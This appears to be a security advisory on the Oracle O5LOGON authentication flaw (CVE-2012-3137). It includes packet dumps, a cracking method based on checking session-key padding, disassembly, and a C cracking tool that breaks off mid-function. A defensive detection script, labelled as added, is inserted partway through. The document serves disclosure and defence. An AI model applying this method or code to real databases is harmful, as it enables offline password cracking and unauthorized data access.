Oracle Database Authentication Protocol Security Restriction Bypass Vulnerability (CVE-2012-3137)

NSFOCUS ID:    20847
BUGTRAQ ID: 55651
CVE ID: CVE-2012-3137
Remote: Yes
Local: Yes
Vulnerability type:
Impact: A remote attacker can brute-force passwords offline
Severity: High
Created: 2012-9-27
Updated:
Exploit code: None

Tracking engineer: zz

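Vulnerability overview:

Oracle is a widely used commercial database.

The Oracle O5LOGON authentication protocol has a flaw that lets an attacker brute-force
Oracle database passwords offline and thereby access the data in a protected Oracle
database. To exploit it, the attacker only needs to know one valid database user name and
one correct database name (SID); no man-in-the-middle attack is required.

Martinez Fayo reported the issue to Oracle in May 2010. Oracle fixed it in mid-2011 with
patch set 11.2.0.3, which uses a new version of the protocol. However, Oracle did not fix
the issue in 11.1 and 11.2, so those versions remain vulnerable.

Because the flaw occurs early in the authentication phase, and the connection is dropped as
soon as the required data has been obtained, no login record is left in the Oracle database.
For this reason it is called the "stealth password cracking vulnerability".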

Details:

The O5LOGON process

         send username
Client -----------------------------> Server

AUTH_SESSKEY AUTH_VFR_DATA
Client <---------------------------- Server

AUTH_SESSKEY AUTH_PASSWORD
Client -----------------------------> Server

The two packets relevant to this vulnerability, which contain the required information, are shown below:

(1) Server -> client

0000   00 f8 00 00 06 00 00 00 00 00 08 02 00 0c 00 00  ................
0010 00 0c 41 55 54 48 5f 53 45 53 53 4b 45 59 60 00 ..AUTH_SESSKEY`.
0020 00 00 60 35 32 46 43 30 34 42 31 46 46 38 31 31 ..`52FC04B1FF811
0030 30 43 41 31 32 36 33 44 46 35 42 43 36 31 41 37 0CA1263DF5BC61A7
0040 45 35 37 37 34 30 43 38 41 35 31 31 31 44 32 32 E57740C8A5111D22
0050 42 34 31 45 35 33 43 43 31 36 37 46 44 46 32 41 B41E53CC167FDF2A
0060 36 38 37 38 39 35 38 32 30 30 44 39 42 32 42 36 6878958200D9B2B6
0070 41 35 31 43 39 35 44 37 37 39 46 44 45 42 41 42 A51C95D779FDEBAB
0080 42 36 39 00 00 00 00 0d 00 00 00 0d 41 55 54 48 B69.........AUTH
0090 5f 56 46 52 5f 44 41 54 41 14 00 00 00 14 34 33 _VFR_DATA.....43
00a0 45 30 42 45 32 30 42 33 32 42 30 42 42 37 36 45 E0BE20B32B0BB76E
00b0 35 37 25 1b 00 00 04 01 00 00 00 02 00 00 00 00 57%.............
00c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00e0 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 ................
00f0 00 00 00 00 00 00 00 00 ........

(2) server <- client

0000   03 73 03 d0 1a 05 0a 09 00 00 00 21 01 00 00 44  .s.........!...D
0010 46 bf bf 0d 00 00 00 ec 42 bf bf d8 53 bf bf 03 F.......B...S...
0020 73 79 73 24 00 00 00 0c 41 55 54 48 5f 53 45 53 sys$....AUTH_SES
0030 53 4b 45 59 20 01 00 00 fe 40 46 41 36 44 43 44 SKEY ....@FA6DCD
0040 30 46 33 38 39 45 39 32 44 31 38 46 38 31 38 38 0F389E92D18F8188
0050 45 43 36 39 33 31 33 42 35 32 34 46 34 32 31 31 EC69313B524F4211
0060 38 34 46 41 45 36 37 39 36 31 33 41 37 32 46 43 84FAE679613A72FC
0070 38 44 46 44 30 41 34 43 37 42 20 42 39 33 41 36 8DFD0A4C7B B93A6
0080 41 43 42 38 45 30 35 42 38 32 35 38 41 30 32 30 ACB8E05B8258A020
0090 44 32 39 35 34 45 43 31 42 36 33 00 01 00 00 00 D2954EC1B63.....
00a0 27 00 00 00 0d 41 55 54 48 5f 50 41 53 53 57 4f '....AUTH_PASSWO
00b0 52 44 c0 00 00 00 40 32 43 35 46 39 35 37 41 36 RD....@2C5F957A6
00c0 35 33 32 41 44 39 31 44 39 31 36 46 34 45 35 46 532AD91D916F4E5F
00d0 41 37 44 32 46 44 41 30 45 36 43 44 46 46 42 41 A7D2FDA0E6CDFFBA
00e0 41 45 44 38 38 33 43 41 46 34 46 32 30 30 43 38 AED883CAF4F200C8
00f0 39 38 33 41 45 33 44 00 00 00 00 18 00 00 00 08 983AE3D.........
0100 41 55 54 48 5f 52 54 54 0f 00 00 00 05 36 36 37 AUTH_RTT.....667
0110 30 38 00 00 00 00 27 00 00 00 0d 41 55 54 48 5f 08....'....AUTH_
0120 43 4c 4e 54 5f 4d 45 4d 0c 00 00 00 04 34 30 39 CLNT_MEM.....409
0130 36 00 00 00 00 27 00 00 00 0d 41 55 54 48 5f 54 6....'....AUTH_T
0140 45 52 4d 49 4e 41 4c 12 00 00 00 06 70 74 73 2f ERMINAL.....pts/
0150 31 38 00 00 00 00 2d 00 00 00 0f 41 55 54 48 5f 18....-....AUTH_
0160 50 52 4f 47 52 41 4d 5f 4e 4d 51 00 00 00 1b 73 PROGRAM_NMQ....s
0170 71 6c 70 6c 75 73 40 68 65 6e 69 63 65 73 20 28 qlplus@henices (
0180 54 4e 53 20 56 31 2d 56 33 29 00 00 00 00 24 00 TNS V1-V3)....$.
0190 00 00 0c 41 55 54 48 5f 4d 41 43 48 49 4e 45 15 ...AUTH_MACHINE.
01a0 00 00 00 07 68 65 6e 69 63 65 73 00 00 00 00 18 ....henices.....
01b0 00 00 00 08 41 55 54 48 5f 50 49 44 0c 00 00 00 ....AUTH_PID....
01c0 04 36 32 32 38 00 00 00 00 18 00 00 00 08 41 55 .6228.........AU
01d0 54 48 5f 53 49 44 15 00 00 00 07 68 65 6e 69 63 TH_SID.....henic
01e0 65 73 00 00 00 00 18 00 00 00 08 41 55 54 48 5f es.........AUTH_
01f0 41 43 4c 0c 00 00 00 04 34 34 30 30 00 00 00 00 ACL.....4400....
0200 36 00 00 00 12 41 55 54 48 5f 41 4c 54 45 52 5f 6....AUTH_ALTER_
0210 53 45 53 53 49 4f 4e 6f 00 00 00 25 41 4c 54 45 SESSIONo...%ALTE
0220 52 20 53 45 53 53 49 4f 4e 20 53 45 54 20 54 49 R SESSION SET TI
0230 4d 45 5f 5a 4f 4e 45 3d 27 2b 30 38 3a 30 30 27 ME_ZONE='+08:00'
0240 00 01 00 00 00 45 00 00 00 17 41 55 54 48 5f 4c .....E....AUTH_L
0250 4f 47 49 43 41 4c 5f 53 45 53 53 49 4f 4e 5f 49 OGICAL_SESSION_I
0260 44 60 00 00 00 20 43 41 41 38 39 33 41 43 30 41 D`... CAA893AC0A
0270 34 33 30 46 41 30 45 30 34 30 30 30 37 46 30 31 430FA0E040007F01
0280 30 31 31 38 35 34 00 00 00 00 30 00 00 00 10 41 011854....0....A
0290 55 54 48 5f 46 41 49 4c 4f 56 45 52 5f 49 44 00 UTH_FAILOVER_ID.
02a0 00 00 00 00 00 00 00 .......
AUTH_SESSKEY_SRV: 52FC04B1FF8110CA1263DF5BC61A7E57740C8A5111D22B41E53CC167FDF2A6878958200D9B2B6A51C95D779FDEBABB69
AUTH_SESSKEY_CLI: FA6DCD0F389E92D18F8188EC69313B524F421184FAE679613A72FC8DFD0A4C7BB93A6ACB8E05B8258A020D2954EC1B63
AUTH_PASSWORD : 2C5F957A6532AD91D916F4E5FA7D2FDA0E6CDFFBAAED883CAF4F200C8983AE3D
AUTH_VFR_DATA : 43E0BE20B32B0BB76E57
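
Because the exchange above can be abandoned before AUTH_PASSWORD is sent and leaves no login record in the database, it has to be spotted on the wire. The following is an added detection example, not code from the original post: it flags connections that received the server challenge and closed without a client response, and matches the returned salt against SPARE4 to name the targeted account. The event tuple layout, function names, addresses and placeholder session keys are assumptions.

```python
import struct

CHALLENGE_KEYS = (b"AUTH_SESSKEY", b"AUTH_VFR_DATA")   # server -> client
RESPONSE_KEYS = (b"AUTH_SESSKEY", b"AUTH_PASSWORD")    # client -> server


def read_value(payload, name):
    """Read the value stored after `name`, assuming the layout visible in the
    server packet above: <u32 LE length><u8 length><value>."""
    pos = payload.find(name)
    if pos < 0 or pos + len(name) + 5 > len(payload):
        return None
    pos += len(name)
    _, length = struct.unpack_from("<IB", payload, pos)
    value = payload[pos + 5:pos + 5 + length]
    return value if len(value) == length else None


def salt_owner(salt_hex, spare4_by_user):
    """Map a captured salt to an account: SPARE4 is 'S:' + 40 hex digits of
    hash + 20 hex digits of salt, as in the sys.user$ query on this page."""
    for user, spare4 in spare4_by_user.items():
        if spare4.startswith("S:") and spare4[42:62].upper() == salt_hex.upper():
            return user
    return None


def find_abandoned_handshakes(events, spare4_by_user=None):
    """events: time-ordered (conn_id, client_ip, kind, payload) tuples with
    kind in {'s2c', 'c2s', 'close'}. Returns one finding per connection that
    received the server challenge and closed without sending AUTH_PASSWORD."""
    pending = {}   # conn_id -> salt (hex text) of a challenge not yet answered
    findings = []
    for conn_id, client_ip, kind, payload in events:
        if kind == "s2c" and all(k in payload for k in CHALLENGE_KEYS):
            salt = read_value(payload, b"AUTH_VFR_DATA") or b""
            pending[conn_id] = salt.decode("ascii", "replace")
        elif kind == "c2s" and all(k in payload for k in RESPONSE_KEYS):
            pending.pop(conn_id, None)      # handshake went on normally
        elif kind == "close" and conn_id in pending:
            salt = pending.pop(conn_id)
            findings.append({
                "conn_id": conn_id,
                "client_ip": client_ip,
                "salt": salt,
                "account": salt_owner(salt, spare4_by_user or {}),
            })
    return findings


def _pair(name, value):
    """Constructed test helper: one name/value pair in the same layout."""
    return (struct.pack("<IB", len(name), len(name)) + name +
            struct.pack("<IB", len(value), len(value)) + value + b"\x00" * 4)


# Constructed sample data: the salt and SPARE4 value are the ones shown on this
# page; session keys, addresses and connection ids are placeholders.
CHALLENGE = (_pair(b"AUTH_SESSKEY", b"A" * 96) +
             _pair(b"AUTH_VFR_DATA", b"43E0BE20B32B0BB76E57"))
RESPONSE = _pair(b"AUTH_SESSKEY", b"B" * 96) + _pair(b"AUTH_PASSWORD", b"C" * 64)
SAMPLE_SPARE4 = {"SYS": "S:C3D98762D258D4BD92C572065DDEA9AF38123F8843E0BE20B32B0BB76E57"}
SAMPLE_EVENTS = [
    (1, "192.0.2.10", "s2c", CHALLENGE),
    (1, "192.0.2.10", "c2s", RESPONSE),
    (1, "192.0.2.10", "close", b""),
    (2, "192.0.2.66", "s2c", CHALLENGE),
    (2, "192.0.2.66", "close", b""),   # dropped right after the challenge
]

if __name__ == "__main__":
    for finding in find_abandoned_handshakes(SAMPLE_EVENTS, SAMPLE_SPARE4):
        print(finding)
```

Legitimate clients also drop connections at this point (timeouts, cancelled logins), so findings are best reviewed per source address and per targeted account rather than alerted on one by one.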

Introduction to the Oracle O5LOGON protocol

The Oracle 11g password hash algorithm is shown below, for user name sys and password nsfocus:

>>> import hashlib
>>> hashlib.sha1(b'nsfocus' + b'\x43\xE0\xBE\x20\xB3\x2B\x0B\xB7\x6E\x57').hexdigest()
'c3d98762d258d4bd92c572065ddea9af38123f88'

This can be checked by querying the Oracle database:

SQL> select name, password, spare4 from sys.user$ where name = 'SYS';

NAME PASSWORD
------------------------------ ------------------------------
SPARE4
--------------------------------------------------------------------------------
SYS 0F2417000362F55F
S:C3D98762D258D4BD92C572065DDEA9AF38123F8843E0BE20B32B0BB76E57

password hash: C3D98762D258D4BD92C572065DDEA9AF38123F88
salt : 43E0BE20B32B0BB76E57
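
  1. The client sends the user name to the server.

  2. The server checks whether the user name is valid; if it is, it moves on to the next step.

  3. The server encrypts AUTH_SESSKEY and retrieves the salt.
    AUTH_SESSKEY is encrypted with AES192 CBC; the key is the 20-byte password hash stored
    in the Oracle database followed by 4 zero bytes (192 bits).

  4. The server sends the encrypted AUTH_SESSKEY and AUTH_VFR_DATA to the client.
    AUTH_VFR_DATA is the salt.

  5. The client computes the password hash (from the password the user entered) and, using
    that hash (plus 4 zero bytes) as the key, encrypts the client AUTH_SESSKEY with AES192 CBC.

  6. The client computes Combine_SessKey.
    The 24 bytes starting at the 17th byte of the decrypted server AUTH_SESSKEY and of the
    client AUTH_SESSKEY are XORed; the first 16 bytes of the XOR result are hashed with MD5
    and the last 8 bytes are hashed with MD5, giving Combine_SessKey.

  7. The client encrypts the plaintext password the user entered with Combine_SessKey to
    obtain AUTH_PASSWORD. The algorithm is AES192 CBC.

  8. The client sends the encrypted client AUTH_SESSKEY and the encrypted AUTH_PASSWORD to the server.

  9. The server decrypts the client AUTH_SESSKEY using the password hash in the database.

  10. The server tries to decrypt AUTH_PASSWORD; if decryption succeeds, authentication passes.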

See:
http://www.oxid.it/downloads/oracle_tns_aes192_check.txt

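The vulnerability is that when the server session key is generated, eight 0x08 bytes are
appended to its end. Because the salt is known (the server returns it), we only need to
compute the SHA-1 password hash for a candidate password and use that hash to decrypt the
server session key. If the result ends in eight 0x08 bytes, it is the correct server session
key and the password used is the correct password. The reason is as follows.

AES 192 has a block length of 128 bits (16 bytes). A block cipher has to pad the plaintext
when its length is not a whole multiple of the block length. Each padding byte holds the
number of missing bytes; for example, an 11-byte plaintext is padded with five 0x05 bytes.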

The generation of the server session key is analysed from the disassembly; the program analysed is Oracle.exe 11.2.0.1.0.
oracle.exe calls oran11.ztvo5ke to encrypt the session key:

oran11.ztvo5ke -> oracrypt11.ztceenc -> orancrypt11.ztcen

struct e_key {
    unsigned char s[2];
    unsigned char key[100];
};

struct sess_key {
    uint32_t type;
    unsigned char key[40];
};

struct pwd_hash {
    uint32_t unknown1;
    uint32_t hash_len;
    unsigned char hash[20];
};

ztvo5ke ( e_key*, sess_key*, pwd_hash*, int);

sess_key.type == 0x1492 ( AES 192 )

plaintext 24 + 16 = 40

.text:101BC481    push    eax                  ; unknown structure
.text:101BC482    push    edx                  ; encrypted session key
.text:101BC483    push    28h                  ; length
.text:101BC485    push    ecx                  ; plaintext session key
.text:101BC486    push    0
.text:101BC488    push    ebx                  ; 0x18
.text:101BC489    push    87004001h
.text:101BC48E    call    ztceenc              ; AES 192
.text:101BC493    add     esp, 1Ch
.text:101BC496    mov     ebx, eax
.text:101BC498    test    ebx, ebx
.text:101BC49A    jnz     short loc_101BC4B8
.text:101BC49C    lea     edx, [ebp+var_A4]
.text:101BC4A2    lea     eax, [edi+2]
.text:101BC4A5    push    eax                  ; e_key+2
.text:101BC4A6    push    [ebp+var_C8]
.text:101BC4AC    push    edx                  ; encrypted session key
.text:101BC4AD    call    ztucbtx

Memory before and after ztceenc runs

0DC3A4E4                                      40 00 00 00                       
0DC3A4F4 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00..
0DC3A504 0C 4A FE 0C 02 00 00 00 FF FF FF FF 13 00 00 00..
0DC3A514 02 00 00 00 00 00 00 00 14 00 00 00 14 00 00 00..
0DC3A524 44 94 3E 10 00 00 00 00 00 00 00 00 00 00 00 00..
0DC3A534 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00..
0DC3A544 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00..
0DC3A554 7A EF 5B 9E 89 D3 9F 07 62 A8 83 BB C6 4D 9F D9..
0DC3A564 EA 7B 90 1C 49 9B 73 36 BE 60 AF F6 69 A4 ED 37..
0DC3A574 8D 1D B3 B7 60 30 C7 56 00 00 00 00 8C A5 C3 0D..
0DC3A584 C8 B3 13 21 77 BF F6 84 28 3A D6 54 9F 65 96 0B..
0DC3A594 0E 0A E4 60 00 00 00 00 00 00 00 00 00 00 00 00..
0DC3A5A4 18 00 00 00 84 A5 C3 0D E0 3E FE 0C A8 46 A7 0C..
0DC3A5B4 94 77 FE 0C 0C C6 C3 0D 4A EA 50 01 F4 C4 C3 0D..
0DC3A5C4 F8 49 FE 0C 10 FB EC 0D..........................


eax = 0DC3A4F0
edx = 0DC3A514
ecx = 0DC3A554
ebx = 0DC3A5A4


0DC3A4E4 30 00 00 00..
0DC3A4F4 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00..
0DC3A504 0C 4A FE 0C 02 00 00 00 FF FF FF FF 13 00 00 00..
0DC3A514 61 15 91 7F D6 AE B9 29 00 07 A4 02 A6 B1 2B AA..
0DC3A524 BD 3B AA 0C 13 C0 E5 18 8E FE BA AC F5 4C 01 BE.
0DC3A534 96 8F 59 0D B9 9E 2C F6 98 74 1F EF 22 CE 17 47..
0DC3A544 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00..
0DC3A554 7A EF 5B 9E 89 D3 9F 07 62 A8 83 BB C6 4D 9F D9..
0DC3A564 EA 7B 90 1C 49 9B 73 36 BE 60 AF F6 69 A4 ED 37..
0DC3A574 8D 1D B3 B7 60 30 C7 56 00 00 00 00 8C A5 C3 0D..
0DC3A584 C8 B3 13 21 77 BF F6 84 28 3A D6 54 9F 65 96 0B..
0DC3A594 0E 0A E4 60 00 00 00 00 00 00 00 00 00 00 00 00..
0DC3A5A4 18 00 00 00 84 A5 C3 0D E0 3E FE 0C A8 46 A7 0C..
0DC3A5B4 94 77 FE 0C 0C C6 C3 0D 4A EA 50 01 F4 C4 C3 0D..
0DC3A5C4 F8 49 FE 0C 10 FB EC 0D


0DC3A4F0 30 00 00 00 offset
0DC3A514 61 15 91 7F ... encrypted session key (0x30 byte)
0DC3A554 7A EF 5B 9E ... plaintext session key (0x28 byte)
0DC3A584 C8 B3 13 21 ... password hash (0x18 byte)

Encrypting a 40-byte plaintext with AES 192 requires padding with eight 0x08 bytes.

11.1

PASSWORD:            nsfocus
AUTH_SESSKEY: 43FD38029377C84620AE1851FC1D231409985064DEA0D0B8D48E50E6051751A5D8FDFEAAA9F83B99F37B051FA67F8546
AUTH_SESSKEY_CLIENT: C7248F0873F04B5A02E59178804BD361B0C77B20A4CF685460DA472996D5245745A791DFEA14399831EC62380808903C
AUTH_PASSWORD: 8B4C7D85F421EBA059FDBA21F5708FD4D3BB8AB2168941243B5EF07681F3B80A
AUTH_VFR_DATA: 3DA8A309D636ACF87004

PASSWORD HASH: EF92924A1DB06441457FDABC24BF89055C8594F7

11.2

PASSWORD    :        nsfocus
AUTH_SESSKEY: 52FC04B1FF8110CA1263DF5BC61A7E57740C8A5111D22B41E53CC167FDF2A6878958200D9B2B6A51C95D779FDEBABB69
AUTH_SESSKEY_C FA6DCD0F389E92D18F8188EC69313B524F421184FAE679613A72FC8DFD0A4C7BB93A6ACB8E05B8258A020D2954EC1B63
AUTH_PASSWORD 2C5F957A6532AD91D916F4E5FA7D2FDA0E6CDFFBAAED883CAF4F200C8983AE3D
AUTH_VFR_DATA 43E0BE20B32B0BB76E57

PASSWORD HASH: C3D98762D258D4BD92C572065DDEA9AF38123F88 43E0BE20B32B0BB76E57
aes key
0000 ef 92 92 4a 1d b0 64 41 45 7f da bc 24 bf 89 05
0010 5c 85 94 f7 00 00 00 00

decrypted_server_sesskey
0000 47 43 56 45 1f 61 c7 89 68 83 be ad ed c0 f4 54
0010 e3 dd 61 88 7e 78 d8 9a bc 8f dc 15 4f a6 2f 26
0020 a0 35 e2 63 68 bb 02 1b 08 08 08 08 08 08 08 08

encrypted_server_sesskey
0000 43 fd 38 02 93 77 c8 46 20 ae 18 51 fc 1d 23 14
0010 09 98 50 64 de a0 d0 b8 d4 8e 50 e6 05 17 51 a5
0020 d8 fd fe aa a9 f8 3b 99 f3 7b 05 1f a6 7f 85 46

AUTH_SESSKEY
0000 43 fd 38 02 93 77 c8 46 20 ae 18 51 fc 1d 23 14
0010 09 98 50 64 de a0 d0 b8 d4 8e 50 e6 05 17 51 a5
0020 d8 fd fe aa a9 f8 3b 99 f3 7b 05 1f a6 7f 85 46
aes key
0000 c3 d9 87 62 d2 58 d4 bd 92 c5 72 06 5d de a9 af
0010 38 12 3f 88 00 00 00 00

decrypted_server_sesskey
0000 21 64 7f ef 76 d3 ee 80 ed 24 47 50 f8 f4 f0 a6
0010 e4 18 a3 2a 40 0b 96 ea 5b 70 26 ab 6a e4 62 f5
0020 81 e0 62 1c 13 a0 21 90 08 08 08 08 08 08 08 08

encrypted_server_sesskey
0000 52 fc 04 b1 ff 81 10 ca 12 63 df 5b c6 1a 7e 57
0010 74 0c 8a 51 11 d2 2b 41 e5 3c c1 67 fd f2 a6 87
0020 89 58 20 0d 9b 2b 6a 51 c9 5d 77 9f de ba bb 69

AUTH_SESSKEY
0000 52 fc 04 b1 ff 81 10 ca 12 63 df 5b c6 1a 7e 57
0010 74 0c 8a 51 11 d2 2b 41 e5 3c c1 67 fd f2 a6 87
0020 89 58 20 0d 9b 2b 6a 51 c9 5d 77 9f de ba bb 69

exploit (POC)

o5logoncrack.c

/* 
11.1

PASSWORD: nsfocus
AUTH_SESSKEY: 43FD38029377C84620AE1851FC1D231409985064DEA0D0B8D48E50E6051751A5D8FDFEAAA9F83B99F37B051FA67F8546
AUTH_SESSKEY_CLIENT: C7248F0873F04B5A02E59178804BD361B0C77B20A4CF685460DA472996D5245745A791DFEA14399831EC62380808903C
AUTH_PASSWORD: 8B4C7D85F421EBA059FDBA21F5708FD4D3BB8AB2168941243B5EF07681F3B80A
AUTH_VFR_DATA: 3DA8A309D636ACF87004

PASSWORD HASH: EF92924A1DB06441457FDABC24BF89055C8594F7

11.2

PASSWORD : nsfocus
AUTH_SESSKEY: 52FC04B1FF8110CA1263DF5BC61A7E57740C8A5111D22B41E53CC167FDF2A6878958200D9B2B6A51C95D779FDEBABB69
AUTH_SESSKEY_C FA6DCD0F389E92D18F8188EC69313B524F421184FAE679613A72FC8DFD0A4C7BB93A6ACB8E05B8258A020D2954EC1B63
AUTH_PASSWORD 2C5F957A6532AD91D916F4E5FA7D2FDA0E6CDFFBAAED883CAF4F200C8983AE3D
AUTH_VFR_DATA 43E0BE20B32B0BB76E57

PASSWORD HASH: C3D98762D258D4BD92C572065DDEA9AF38123F88 43E0BE20B32B0BB76E57

11.x
ED91B97A04000F326F17430A65DACB30CD1EF788E6EC310742B811E32112C0C9CC39554C9C01A090CB95E95C94140C28
40E7B86C99F4BF1D0F17538C22EBCE054F5F677E2B521480F1F56143D047C00469A87049DE1B9CADDC8EA71392AD6E3A
2D4FD970C12D9618742E4525C514105E0BE24DE75C04A0C4BF6DD46BE88A339E
7FD52BC80AA5836695D4
18C314BE125DF23689215C78C33F623AABF1152E


-------------------------------------
aes key
0000 ef 92 92 4a 1d b0 64 41 45 7f da bc 24 bf 89 05
0010 5c 85 94 f7 00 00 00 00

decrypted_server_sesskey
0000 47 43 56 45 1f 61 c7 89 68 83 be ad ed c0 f4 54
0010 e3 dd 61 88 7e 78 d8 9a bc 8f dc 15 4f a6 2f 26
0020 a0 35 e2 63 68 bb 02 1b 08 08 08 08 08 08 08 08

encrypted_server_sesskey
0000 43 fd 38 02 93 77 c8 46 20 ae 18 51 fc 1d 23 14
0010 09 98 50 64 de a0 d0 b8 d4 8e 50 e6 05 17 51 a5
0020 d8 fd fe aa a9 f8 3b 99 f3 7b 05 1f a6 7f 85 46

AUTH_SESSKEY
0000 43 fd 38 02 93 77 c8 46 20 ae 18 51 fc 1d 23 14
0010 09 98 50 64 de a0 d0 b8 d4 8e 50 e6 05 17 51 a5
0020 d8 fd fe aa a9 f8 3b 99 f3 7b 05 1f a6 7f 85 46

----------------
aes key
0000 c3 d9 87 62 d2 58 d4 bd 92 c5 72 06 5d de a9 af
0010 38 12 3f 88 00 00 00 00

decrypted_server_sesskey
0000 21 64 7f ef 76 d3 ee 80 ed 24 47 50 f8 f4 f0 a6
0010 e4 18 a3 2a 40 0b 96 ea 5b 70 26 ab 6a e4 62 f5
0020 81 e0 62 1c 13 a0 21 90 08 08 08 08 08 08 08 08

encrypted_server_sesskey
0000 52 fc 04 b1 ff 81 10 ca 12 63 df 5b c6 1a 7e 57
0010 74 0c 8a 51 11 d2 2b 41 e5 3c c1 67 fd f2 a6 87
0020 89 58 20 0d 9b 2b 6a 51 c9 5d 77 9f de ba bb 69

AUTH_SESSKEY
0000 52 fc 04 b1 ff 81 10 ca 12 63 df 5b c6 1a 7e 57
0010 74 0c 8a 51 11 d2 2b 41 e5 3c c1 67 fd f2 a6 87
0020 89 58 20 0d 9b 2b 6a 51 c9 5d 77 9f de ba bb 69

------------------
aes key
0000 18 c3 14 be 12 5d f2 36 89 21 5c 78 c3 3f 62 3a
0010 ab f1 15 2e 00 00 00 00

decrypted_server_sesskey
0000 07 eb ab db ee 3a 0e b0 ab e1 9f 68 12 c1 e3 e6
0010 5a e9 fd 7c b9 ca ae e2 fb 21 20 d4 af 83 de 0c
0020 1e 12 dc 01 22 05 a0 75 08 08 08 08 08 08 08 08

encrypted_server_sesskey
0000 ed 91 b9 7a 04 00 0f 32 6f 17 43 0a 65 da cb 30
0010 cd 1e f7 88 e6 ec 31 07 42 b8 11 e3 21 12 c0 c9
0020 cc 39 55 4c 9c 01 a0 90 cb 95 e9 5c 94 14 0c 28

AUTH_SESSKEY
0000 ed 91 b9 7a 04 00 0f 32 6f 17 43 0a 65 da cb 30
0010 cd 1e f7 88 e6 ec 31 07 42 b8 11 e3 21 12 c0 c9
0020 cc 39 55 4c 9c 01 a0 90 cb 95 e9 5c 94 14 0c 28

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <openssl/aes.h>
#include <openssl/md5.h>
#include <openssl/sha.h>
#include "getopt.h"


//*********************************************************************************************************************
// Hashes captured on the network during authentication phase

//unsigned char AUTH_SESSKEY [] = { 0x43,0xFD,0x38,0x02,0x93,0x77,0xC8,0x46,0x20,0xAE,0x18,0x51,0xFC,0x1D,0x23,0x14,0x09,0x98,0x50,0x64,0xDE,0xA0,0xD0,0xB8,0xD4,0x8E,0x50,0xE6,0x05,0x17,0x51,0xA5,0xD8,0xFD,0xFE,0xAA,0xA9,0xF8,0x3B,0x99,0xF3,0x7B,0x05,0x1F,0xA6,0x7F,0x85,0x46};
//
//unsigned char AUTH_SESSKEY_C[] = { 0xC7,0x24,0x8F,0x08,0x73,0xF0,0x4B,0x5A,0x02,0xE5,0x91,0x78,0x80,0x4B,0xD3,0x61,0xB0,0xC7,0x7B,0x20,0xA4,0xCF,0x68,0x54,0x60,0xDA,0x47,0x29,0x96,0xD5,0x24,0x57,0x45,0xA7,0x91,0xDF,0xEA,0x14,0x39,0x98,0x31,0xEC,0x62,0x38,0x08,0x08,0x90,0x3C};
//
//unsigned char AUTH_PASSWORD [] = { 0x8B,0x4C,0x7D,0x85,0xF4,0x21,0xEB,0xA0,0x59,0xFD,0xBA,0x21,0xF5,0x70,0x8F,0xD4,0xD3,0xBB,0x8A,0xB2,0x16,0x89,0x41,0x24,0x3B,0x5E,0xF0,0x76,0x81,0xF3,0xB8,0x0A };
//
//unsigned char AUTH_VFR_DATA [] = { 0x3D,0xA8,0xA3,0x09,0xD6,0x36,0xAC,0xF8,0x70,0x04 };

//unsigned char AUTH_SESSKEY [] = { 0x52,0xFC,0x04,0xB1,0xFF,0x81,0x10,0xCA,0x12,0x63,0xDF,0x5B,0xC6,0x1A,0x7E,0x57,0x74,0x0C,0x8A,0x51,0x11,0xD2,0x2B,0x41,0xE5,0x3C,0xC1,0x67,0xFD,0xF2,0xA6,0x87,0x89,0x58,0x20,0x0D,0x9B,0x2B,0x6A,0x51,0xC9,0x5D,0x77,0x9F,0xDE,0xBA,0xBB,0x69 };
//
//unsigned char AUTH_SESSKEY_C[] = { 0xFA,0x6D,0xCD,0x0F,0x38,0x9E,0x92,0xD1,0x8F,0x81,0x88,0xEC,0x69,0x31,0x3B,0x52,0x4F,0x42,0x11,0x84,0xFA,0xE6,0x79,0x61,0x3A,0x72,0xFC,0x8D,0xFD,0x0A,0x4C,0x7B,0xB9,0x3A,0x6A,0xCB,0x8E,0x05,0xB8,0x25,0x8A,0x02,0x0D,0x29,0x54,0xEC,0x1B,0x63 };
//
//unsigned char AUTH_PASSWORD [] = { 0x2C,0x5F,0x95,0x7A,0x65,0x32,0xAD,0x91,0xD9,0x16,0xF4,0xE5,0xFA,0x7D,0x2F,0xDA,0x0E,0x6C,0xDF,0xFB,0xAA,0xED,0x88,0x3C,0xAF,0x4F,0x20,0x0C,0x89,0x83,0xAE,0x3D };
//
//unsigned char AUTH_VFR_DATA [] = { 0x43,0xE0,0xBE,0x20,0xB3,0x2B,0x0B,0xB7,0x6E,0x57 };
//


//unsigned char AUTH_SESSKEY [] = { 0xED,0x91,0xB9,0x7A,0x04,0x00,0x0F,0x32,0x6F,0x17,0x43,0x0A,0x65,0xDA,0xCB,0x30,0xCD,0x1E,0xF7,0x88,0xE6,0xEC,0x31,0x07,0x42,0xB8,0x11,0xE3,0x21,0x12,0xC0,0xC9,0xCC,0x39,0x55,0x4C,0x9C,0x01,0xA0,0x90,0xCB,0x95,0xE9,0x5C,0x94,0x14,0x0C,0x28 };

//unsigned char AUTH_VFR_DATA [] = { 0x7F,0xD5,0x2B,0xC8,0x0A,0xA5,0x83,0x66,0x95,0xD4 };

//unsigned char AUTH_SESSKEY [] = { 0xBD,0x53,0x44,0x89,0x91,0xEE,0xAB,0x1E,0xCD,0x8D,0x32,0xFB,0x59,0x52,0x3F,0x0C,0xBD,0xB3,0x3B,0x40,0xC2,0x8F,0xEB,0xED,0xDD,0x5A,0xA3,0xA4,0xAF,0x0C,0xF6,0xB7,0x23,0x06,0x16,0x2D,0x3F,0x0C,0x1E,0x8D,0xB2,0x53,0x8A,0xF2,0x91,0xEC,0x01,0xA5};

//unsigned char AUTH_VFR_DATA [] = { 0x03,0x1C,0xB4,0x72,0xC4,0xD9,0x04,0x12,0xDD,0x31 };

//*********************************************************************************************************************

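// Convert a string of uppercase hex digits to bytes; returns the number of bytes written.
// The caller must make sure array can hold strlen(str)/2 bytes.
int HexStringtoBinArray(char* str, unsigned char* array){
    size_t slen=strlen(str);
    unsigned char t[2];
    unsigned int hexc;
    int j=0;
    size_t i=0;
    // i+1 < slen: never read past the end of an odd-length string
    for(;i+1<slen;i=i+2){
        t[0]=str[i];
        t[1]=str[i+1];
        hexc = t[0]-48;
        if (hexc > 9) hexc-=7;
        array[j]=hexc*16;
        hexc = t[1]-48;
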